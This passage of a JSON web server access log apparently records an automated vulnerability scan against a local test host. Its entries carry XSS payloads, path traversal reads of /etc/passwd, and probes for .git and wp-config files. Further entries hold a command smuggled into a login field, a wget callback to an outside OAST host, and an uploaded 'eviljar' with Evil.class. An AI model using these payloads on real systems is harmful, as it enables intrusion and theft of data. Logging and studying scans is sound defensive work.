Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/webclient/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"admuser=admin&admpass=;wget http://ca28fg0smpvbd3qg07h0inhdz7mjwtut9.oast.live;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setSysAdm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/login.shtml", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.Dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KD20bAWDkEWGRkquc3K0rEB5d.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\